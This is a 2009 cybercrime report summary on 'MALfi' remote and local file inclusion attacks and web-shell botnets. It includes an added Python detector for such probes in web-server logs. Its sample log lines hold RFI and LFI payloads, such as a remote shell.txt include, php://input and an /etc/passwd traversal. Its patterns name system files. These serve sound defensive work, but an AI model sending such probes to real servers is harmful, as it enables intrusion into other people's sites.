MALfi - A CyberCrime International Report
License: Creative Commons by-nc-nd
Changed at: 2009-11-11 07:00:00
CyberCrime International – MALfi
A new cybercrime report from HostExploit.com, the producers of the definitive reports exposing RBN (Russian Business Network), Atrivo, McColo and Real Host, and a foremost source of rogue-network activity analysis on the Internet.
MALfi “A Silent Threat”
What is MALfi about? A blended threat currently detected on around 350,000 websites and Internet servers. One major purpose is to establish "use once and throw away" disposable botnets for spam, phishing, DDoS and further exploitation.
Abstract / Press Release
MALfi is an umbrella term coined to describe the recent blended attack used by hackers and cyber criminals to compromise websites and servers: a combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross-server attack) and RCE (remote code execution).
Conservative estimates over recent months indicate around 350,000 affected websites and servers worldwide. HostExploit and associated researchers have tracked 103,351 attacks from 2,743 unique IP addresses, with RFI scanning sources located in 85 countries and 911 ASNs.
RFI is used by hackers to compromise websites and upload a remotely controlled shell (a web shell), giving them partial to full manual, unauthorized control over the server. This differs from the now familiar "drive-by" website exploit: it provides hackers with a ready-made arena in which Internet plunder, in the form of information, controlled servers and websites, is exchanged or resold to cyber-criminal groups.
Essentially, RFI hackers continuously and automatically scan websites for vulnerabilities to exploit. Once breached, the websites, and often the underlying servers compromised along with them, are used for DDoS (distributed denial of service) attacks such as the recent US and Korean government DDoS, for spamming, phishing and large-scale ID theft, and to facilitate further attacks on other targets. It follows that many of the regular attack attempts seen against various high-volume governmental and key servers were RFI and similar vulnerability scanning by bots and scripts.
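The scanning described above leaves a distinctive trail in ordinary web-server access logs: an include-style query parameter pointed at an absolute URL (RFI), at a PHP stream wrapper, or at a traversal path such as /etc/passwd (LFI). The following detector is an added example, not code from the HostExploit report; it assumes Apache/nginx "combined" log format, and the log lines, hostnames and IP addresses (RFC 5737 documentation ranges) are constructed for the demonstration. It decodes each parameter value, classifies it, and aggregates hits per source IP and per targeted parameter, the same two dimensions the report counts.

```python
"""First-pass RFI/LFI probe detector for web-server access logs.

Added example; not part of the HostExploit MALfi report. Assumes the
Apache/nginx "combined" log format. Sample log lines below are constructed.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# combined format: ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Remote-file indicators: absolute URLs, plus PHP stream wrappers that let an
# attacker feed their own code into include()/require() (grouped with RFI here).
REMOTE_RE = re.compile(r'^(?:https?|ftps?)://|^(?:php|data|expect|phar)://', re.IGNORECASE)
# Local-file indicators: directory traversal and files typical of LFI probing
# or LFI-to-RCE chains (log poisoning, /proc/self/environ).
LOCAL_RE = re.compile(r'\.\./|\.\.\\|/etc/passwd|/proc/self/environ|/var/log/', re.IGNORECASE)


def classify_param(value):
    """Return 'RFI', 'LFI' or None for one query-parameter value."""
    v = unquote(unquote(value))  # scanners often double-encode; peel both layers
    v = v.replace('\x00', '')    # legacy %00 null-byte truncation trick
    if REMOTE_RE.search(v):
        return 'RFI'
    if LOCAL_RE.search(v):
        return 'LFI'
    return None


def analyze_request(target):
    """Return a list of (kind, param, value) findings for one request target."""
    query = urlsplit(target).query
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        kind = classify_param(value)
        if kind:
            findings.append((kind, name, value))
    return findings


def scan_log(lines):
    """Parse log lines and aggregate probe attempts by source IP and by parameter."""
    by_ip, by_param, kinds, details = Counter(), Counter(), Counter(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined line; skip rather than guess
        for kind, param, value in analyze_request(m['target']):
            by_ip[m['ip']] += 1
            by_param[param] += 1
            kinds[kind] += 1
            details.append((m['ip'], kind, param, value, m['status']))
    return {'by_ip': by_ip, 'by_param': by_param, 'kinds': kinds, 'details': details}


# Constructed sample: one scanner hitting two include parameters (plain and
# URL-encoded) and a wrapper, one LFI traversal with %00, and two benign requests.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Nov/2009:03:14:07 +0000] "GET /index.php?page=http://198.51.100.7/shell.txt? HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"',
    '203.0.113.10 - - [10/Nov/2009:03:14:09 +0000] "GET /modules.php?name=News&file=http%3A%2F%2F198.51.100.7%2Fid.txt%3F HTTP/1.1" 404 211 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [10/Nov/2009:03:20:41 +0000] "GET /view.php?template=../../../../etc/passwd%00 HTTP/1.1" 200 1044 "-" "Mozilla/4.0"',
    '192.0.2.55 - - [10/Nov/2009:03:22:13 +0000] "GET /index.php?page=about HTTP/1.1" 200 3180 "http://example.org/" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Nov/2009:03:25:58 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"',
    '192.0.2.77 - - [10/Nov/2009:03:30:00 +0000] "POST /login.php HTTP/1.1" 302 0 "http://example.org/" "Mozilla/5.0"',
]

if __name__ == '__main__':
    result = scan_log(SAMPLE_LOG)
    print('attempts by kind:', dict(result['kinds']))
    print('attempts by source IP:', result['by_ip'].most_common())
    print('targeted parameters:', result['by_param'].most_common())
    for ip, kind, param, value, status in result['details']:
        print(f'{ip:15} {kind:4} {param}={value!r} -> HTTP {status}')
```

A 200 response to an RFI probe is worth treating differently from a 404: it does not prove the remote file was included, but it means the targeted script exists and accepted the parameter, which is exactly what the scanner moves on to exploit. The pattern lists are deliberately short; production use would add the application's own include-style parameter names and an allowlist for parameters that legitimately carry URLs (redirect targets, feed readers) to keep the false-positive rate down.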
Compared with SQL injection, viruses and worms, RFI scanning and the exploitation that follows happen continuously and affect all corners of the Internet. Like an unpatched Windows system, a system with an RFI vulnerability has, in effect, a limited time to live before it is found and compromised.
The how, what and where of this hacking technique and cybercrime business model, together with detailed and graphic explanations, are provided in the HostExploit community research report.